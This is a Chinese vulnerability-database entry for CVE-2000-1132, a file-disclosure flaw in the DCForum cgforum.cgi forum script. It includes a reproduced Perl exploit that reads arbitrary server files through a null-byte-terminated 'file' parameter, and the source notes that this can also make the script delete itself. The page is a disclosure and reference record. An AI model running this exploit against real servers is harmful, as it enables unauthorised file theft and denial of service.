DCForum cgforum.cgi CG脚本取任意文件且删除程序本身漏洞

DCForum cgforum.cgi CG脚本取任意文件且删除程序本身漏洞

漏洞ID 1106087 漏洞类型 未知
发布时间 2000-11-14 更新时间 2005-10-12
图片[1]-DCForum cgforum.cgi CG脚本取任意文件且删除程序本身漏洞-安全小百科CVE编号 CVE-2000-1132
图片[2]-DCForum cgforum.cgi CG脚本取任意文件且删除程序本身漏洞-安全小百科CNNVD-ID CNNVD-200101-065
漏洞平台 CGI CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/20405
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200101-065
|漏洞详情
DCForumcgforum.cgiCG脚本存在漏洞。远程攻击者借助畸形的”forum”变量读取任意文件且删除程序本身。
|漏洞EXP
# source: http://www.securityfocus.com/bid/1951/info
#
# DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
#
#The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.
#

#!/usr/bin/perl
# DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To
CGISecurity.com Advisory)
# Exploits Vulnerability That Allows Remote File Reading
# By SteeLe
# BEGIN { open(STDERR,">errors.txt"); } error checking
$lynx = "/usr/bin/lynx"; # specify

$site = $ARGV[0];
$cgi  = $ARGV[1];
$inet = inet_aton($site);

die "nt---   Usage:$0 <site> <cgi location,duh>  ---" if(@ARGV == '0' ||
@ARGV < 2);

print "nt---   DCForum 1.0 - 6.0 Exploit ---";
print "nt---   By the cool fellas at *   ---nn";

while(true) { # yea i think I stole this from the pollex.pl , uh thanks.

print "[dcforum]Option:";
$action = <STDIN>;
chomp($action);

print "Valid Options: r(read files, usage r <file>), q(quit)n" if($action
ne "r" || $action ne "q");

if ($action eq "r") {
print "nFile(to read):";
$file = <STDIN>;
chomp($file);
# Old fashion shit, and I was lazy so be happy
$url = "?az=list&file=$file%00";
$site = `$lynx http://$site$cgi$url`;
print $site;
}
elsif ($action eq "q") {
 print "now exiting programn";
 exit;
  }
}
# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)]
|参考资料

来源:BID
名称:1951
链接:http://www.securityfocus.com/bid/1951
来源:BUGTRAQ
名称:20001114Cgisecurity.comadvisoryondcforum
链接:http://archives.neohapsis.com/archives/bugtraq/2000-11/0218.html
来源:www.dcscripts.com
链接:http://www.dcscripts.com/dcforum/dcfNews/124.html#1
来源:XF
名称:dcforum-cgi-view-files(5533)
链接:http://xforce.iss.net/xforce/xfdb/5533
来源:OSVDB
名称:1646
链接:http://www.osvdb.org/1646

相关推荐: Eudora及Eudora Light崩溃漏洞

Eudora及Eudora Light崩溃漏洞 漏洞ID 1207323 漏洞类型 未知 发布时间 1998-07-29 更新时间 1998-07-29 CVE编号 CVE-1999-1448 CNNVD-ID CNNVD-199807-029 漏洞平台 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享